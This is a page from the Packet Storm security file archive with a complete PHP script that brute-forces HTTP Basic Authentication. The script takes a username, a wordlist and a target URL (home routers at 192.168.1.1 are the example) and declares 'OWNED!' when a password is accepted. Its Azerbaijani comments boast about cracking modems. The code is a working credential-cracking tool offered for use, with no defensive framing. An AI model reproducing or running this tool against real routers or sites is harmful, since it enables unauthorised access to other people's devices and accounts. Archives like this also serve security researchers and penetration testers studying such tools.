exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Basic Authentication Bruteforcer

Basic Authentication Bruteforcer
Posted Mar 16, 2014
Authored by Akastep

This is a php script for brute forcing basic authentication. Takes a word list as input.

tags | cracker, php
SHA-256 | 2c34929a4ee75e635f22f8cd534b8efd1b01310758d6e71dc4bf7d43ccbfac8f

Basic Authentication Bruteforcer

Change Mirror Download
<?php
error_reporting(0);
ini_set('memory_limit', '6000M');
set_time_limit(0);


/*

HTTP BASIC AUTH BRUTEFORCER PUBLIC edition
Qirilmayan Modem Qalmayacaq xD
/AkaStep


Usage:

$ php -f modembrute.php

############################################################
**************** HTTP BASIC AUTH BRUTEFORCER **************
********************* Istifade qaydasi ********************
php -f script.php username luget.txt http://192.168.1.1/
********************* Coded By AkaStep ********************
***********************************************************




*/

$usage=' php -f script.php username luget.txt http://192.168.1.1/';
$banner=str_repeat('#',60) . PHP_EOL . ' **************** HTTP BASIC AUTH BRUTEFORCER **************' . PHP_EOL .
' ********************* Istifade qaydasi ********************'.
PHP_EOL .$usage . PHP_EOL .
' ********************* Coded By AkaStep ********************'. PHP_EOL .
' *********************************************************** ' .PHP_EOL ;



$uname=$argv[1];

$luget=$argv[2];

$ip=$argv[3];


if(count($argv)!=4){ die(PHP_EOL . $banner . PHP_EOL);}

echo $banner;

//print_r($argv);exit; 1
$passmassiv=file($luget) or die('LUGETI ACA BILMIREM!' .PHP_EOL);




foreach($passmassiv as $pass)
{

!isset($za) ? $za=NULL : '';$za++;


$pass=trim((string)$pass);




$ch = curl_init();
$curlConfig = array(
CURLOPT_URL => $ip,
CURLOPT_POST => false,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
curl_setopt($ch, CURLOPT_TIMEOUT, 12),
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Basic ' . base64_encode($uname.':'.$pass))));

curl_setopt_array($ch, $curlConfig);
curl_exec($ch);

$stat_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);//200 SUCCESS VERIR.//
echo 'HTTP STATUS CODE: ' . $stat_code . ' ';




curl_close($ch);




if($stat_code!==401) // success 200
{
echo '[' . $za .']' . ' ' . 'OWNED! ' . htmlspecialchars((string)$uname) . ' PASSWD: ' . htmlspecialchars((string)$pass). PHP_EOL;
exit;
}
else
{
echo '[' .$za .']' . ' ' . 'YOXLANILIR => ' . htmlspecialchars((string)$uname) . ' PAROL QISMINDE ISE: ' . htmlspecialchars((string)$pass). PHP_EOL;
}


}

unset($pass);


?>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close